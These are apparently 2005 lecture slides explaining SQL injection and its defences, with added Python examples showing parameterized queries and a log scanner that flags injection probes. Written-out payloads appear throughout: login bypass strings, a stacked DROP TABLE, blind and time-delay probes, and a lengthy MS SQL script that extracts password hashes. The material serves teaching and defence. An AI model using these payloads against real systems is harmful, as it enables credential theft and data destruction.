
SQL Injection Attacks
Andrey Rakowitsch, November 18th 2005


First: What is SQL?
• Structured Query Language: interface to relational database systems.
• Allows for insert, update, delete, and retrieval of data in a database.
• ANSI, ISO standard, used extensively in web applications.
• Example: select ProductName from products where ProductID = 40;

How is it normally used in websites?
1. Take user input from a web form and pass it to a server-side script via HTTP methods such as POST or GET.
2. Process request, open connection to database.
3. Query database and retrieve results.
4. Send processed results back to user.
(Diagram: Web server / Application server / Database server)


PHP example
$name = $HTTP_POST_VARS["name"];                                    // untrusted form input
$query = "select * from restaurants where name = '" . $name . "'";  // concatenated straight into the SQL text
$result = mysql_query($query);


What is SQL Injection?
• The ability to inject SQL commands into the database engine through an existing application.
• For example, if the user input is "23 or 1 = 1":
  select ProductName from products where ProductID = 23 or 1 = 1
• All product names will be returned. Data leak.

What is SQL Injection?
• A flaw in the web application, not in the database or web server.
• No matter how patched your system is, no matter how many ports you close, an attacker can get complete ownership of your database.
• NMap or Nessus will not help you against sloppy code.
• In essence: client-supplied data used without validation.

Brief History of SQL Injection
• First mention by rain forest puppy in Phrack 54, December 1998.
• In February 2000 rfp publishes "How I hacked Packetstorm – A look at hacking wwwthreads via SQL".
• January 2002: Chris Anley published "Advanced SQL Injection in SQL Server Applications". First in-depth paper.
• At Blackhat 2004, 0x90.org released SQeaL (predecessor to Absinthe).

What can SQL Injection do?
• Delete:
  Select productinfo from table where productname = 'whatever'; DROP TABLE productinfo; -- '
• Bypass authentication
  – Select * from users where username='user' and password='passwd';
  – select * from users where username='admin'--' and password='whocares';

Not always that simple
• Grabbing MS SQL Server hashes. The injected string, reformatted; it walks master.dbo.sysxlogins and builds a hex string of each login's password hash:
'; begin
  declare @var varchar(8000), @xdate1 datetime, @binvalue varbinary(255),
          @charvalue varchar(255), @i int, @length int, @hexstring char(16)
  set @var = ':'
  select @xdate1 = (select min(xdate1) from master.dbo.sysxlogins where password is not null)
  begin
    while @xdate1 <= (select max(xdate1) from master.dbo.sysxlogins where password is not null)
    begin
      select @binvalue = (select password from master.dbo.sysxlogins where xdate1 = @xdate1),
             @charvalue = '0x', @i = 1, @length = datalength(@binvalue),
             @hexstring = '0123456789ABCDEF'
      -- convert the hash one byte at a time into two hex digits
      while (@i <= @length)
      begin
        declare @tempint int, @firstint int, @secondint int
        select @tempint = CONVERT(int, SUBSTRING(@binvalue, @i, 1))
        select @firstint = FLOOR(@tempint / 16)
        select @secondint = @tempint - (@firstint * 16)
        select @charvalue = @charvalue + SUBSTRING(@hexstring, @firstint + 1, 1)
                                       + SUBSTRING(@hexstring, @secondint + 1, 1)
        select @i = @i + 1
      end
      select @var = @var + ' | ' + name + '/' + @charvalue
        from master.dbo.sysxlogins where xdate1 = @xdate1
      select @xdate1 = (select isnull(min(xdate1), getdate()) from master..sysxlogins
                        where xdate1 > @xdate1 and password is not null)
    end
    select @var as x into temp
  end
end --

Possibilities are endless
• Some examples:
  – Brute forcing passwords using the attacked server to do the processing.
  – Interact with the OS, reading and writing files.
  – Gather IP information through reverse lookup.
  – Start an FTP service on the attacked server.
  – Retrieve VNC passwords from the registry.
  – File uploading.

Error Based SQL Injection
select * from table where id = convert(int, SYSTEM_USER)
Output: [Microsoft][ODBC SQL Server Driver][SQLServer]Syntax error converting the nvarchar value 'sa' to a column of data type int.
• Error based SQL injection is used solely on Microsoft SQL Server.

Blind SQL Injection
• When no explicit error information is available to the attacker.
• Make use of boolean values to ask the database yes or no questions, then interpret the HTML results for TRUE and FALSE signatures.
• Much slower: in the worst case it takes 7 yes or no questions to find the first character of a username using binary search.
• That is why automated tools exist.

Blind SQL Injection (example)
• Base cases:
  – eng.usf.edu/results.jsp?id=4 and 1 = 1 (always true)
  – eng.usf.edu/results.jsp?id=4 and 1 = 0 (always false)
• Is the 8th character of the username greater than ASCII value 82?
• Extract data a character at a time.


How to recognize T and F signatures?
• Several solutions:
  – Keyword search
  – MD5 sum
  – Text difference engine
  – HTML parse tree
  – Linear representation of ASCII sums
  – Tolerance band comparison with subtractive filter
  – Adaptive filter

Blind SQL Injection
• NOTE: Even when boolean HTML signatures are not available, an attacker can use if statements to get a yes or no response. Examples:
  – '; if condition waitfor delay '0:0:5'   (MS SQL Server)
  – '; union select if( condition , benchmark (100000, sha1('test')), 'false' ),1,1,1,1;   (MySQL)

• Check and filter user input.
  – Length limit on input (most attacks depend on long query strings).
  – Different types of input have a specific language and syntax associated with them, e.g. name, email, etc.
  – Do not allow suspicious keywords (DROP, INSERT, SELECT, SHUTDOWN) as a name, for example.
  – Try to bind variables to specific types.

• Call stored procedures instead of directly sending SQL statements to the database.
  – Good in order to bind variables.
  – Has some overhead associated with it.
  – Harder to code, not as flexible.
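Added example, not from the slides: the concatenation pattern of the PHP slide next to the bound-variable alternative that this bullet and the input-filtering bullet recommend, in Python against an in-memory SQLite table constructed for the demo. The users table, its two accounts and the username regex are assumptions.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the slides' "users" table (accounts are made up).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, password text)")
    conn.executemany("insert into users values (?, ?)",
                     [("admin", "s3cret"), ("user", "passwd")])
    return conn

def login_vulnerable(conn, username, password):
    # Same pattern as the PHP slide: untrusted input glued into the SQL text,
    # so admin'-- closes the string and comments out the password check.
    query = ("select username from users where username='" + username +
             "' and password='" + password + "'")
    return [row[0] for row in conn.execute(query)]

def login_parameterized(conn, username, password):
    # Bound variables: the values travel separately from the statement, so a
    # quote or -- in the input is compared as data and never parsed as SQL.
    query = "select username from users where username=? and password=?"
    return [row[0] for row in conn.execute(query, (username, password))]

# Assumed allow-list policy for the "specific syntax per input type" bullet:
# a username is 1-32 characters from a fixed alphabet, nothing else.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")

def is_valid_username(username):
    return USERNAME_RE.fullmatch(username) is not None

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "admin'--", "whocares"))      # ['admin']: check bypassed
    print(login_parameterized(db, "admin'--", "whocares"))   # []: no such user
    print(is_valid_username("admin'--"))                     # False: rejected before any query
```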


• Principle of Least Privilege
  – A user or process should have the lowest level of privilege required to perform its assigned task.
  – If you know a specific user will only read from the database, do not grant it root privileges.
  – Segregate users. Define roles.


• Configure error reporting
  – Never expose internal error information to the user.

• Intrusion Detection System
  – It is possible to get signatures of SQL Injection (especially blind) attacks.
  – Log "DoS like" behavior.
  – "Warning: illegal use of this application has been detected. Legal actions will be taken..."
  – Random seed generation to mess up True and False signatures.
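Added example, not from the slides: a small log scanner that applies signatures for the techniques shown earlier (the and 1=1 / and 1=0 base cases, waitfor delay and benchmark(), a stacked DROP, the '-- truncation) to constructed access-log lines and flags clients whose probe volume looks DoS-like. The log format, the client addresses and the probe threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the slides): one benign client, one client
# repeating the "and 1=1" / "and 1=0" base-case probes, one trying delays and comments.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Nov/2005:10:00:01 +0000] "GET /results.jsp?id=4 HTTP/1.1" 200 5120
10.0.0.9 - - [18/Nov/2005:10:00:02 +0000] "GET /results.jsp?id=4%20and%201%3D1 HTTP/1.1" 200 5120
10.0.0.9 - - [18/Nov/2005:10:00:02 +0000] "GET /results.jsp?id=4%20and%201%3D0 HTTP/1.1" 200 812
10.0.0.9 - - [18/Nov/2005:10:00:03 +0000] "GET /results.jsp?id=4%20and%201%3D1 HTTP/1.1" 200 5120
10.0.0.7 - - [18/Nov/2005:10:00:05 +0000] "GET /results.jsp?id=4;%20waitfor%20delay%20%270:0:5%27 HTTP/1.1" 200 5120
10.0.0.7 - - [18/Nov/2005:10:00:09 +0000] "GET /search.php?name=admin%27-- HTTP/1.1" 200 4010
10.0.0.7 - - [18/Nov/2005:10:00:12 +0000] "GET /search.php?name=whatever%27;%20DROP%20TABLE%20productinfo;%20-- HTTP/1.1" 500 310
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)$')

# Signatures for the techniques the slides show; matched on the URL-decoded request.
SIGNATURES = {
    "boolean_probe": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),   # and 1=1 / and 1=0
    "time_delay":    re.compile(r"waitfor\s+delay|benchmark\s*\(", re.I),  # timing-based yes/no
    "stacked_ddl":   re.compile(r";\s*(?:drop|shutdown)\b", re.I),          # '; DROP TABLE ...
    "comment_trunc": re.compile(r"'\s*--"),                                 # admin'--
}

def parse_line(line):
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["url"] = unquote_plus(rec["url"])   # decode %27, %20, ... before matching
    return rec

def scan_log(text, probe_threshold=3):
    # hits: (ip, signature, decoded url); noisy: clients whose count of blind-style
    # probes reached probe_threshold, the "DoS like" volume the slide says to log.
    hits, probes = [], Counter()
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, rx in SIGNATURES.items():
            if rx.search(rec["url"]):
                hits.append((rec["ip"], name, rec["url"]))
                if name in ("boolean_probe", "time_delay"):
                    probes[rec["ip"]] += 1
    noisy = {ip for ip, n in probes.items() if n >= probe_threshold}
    return hits, noisy
```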
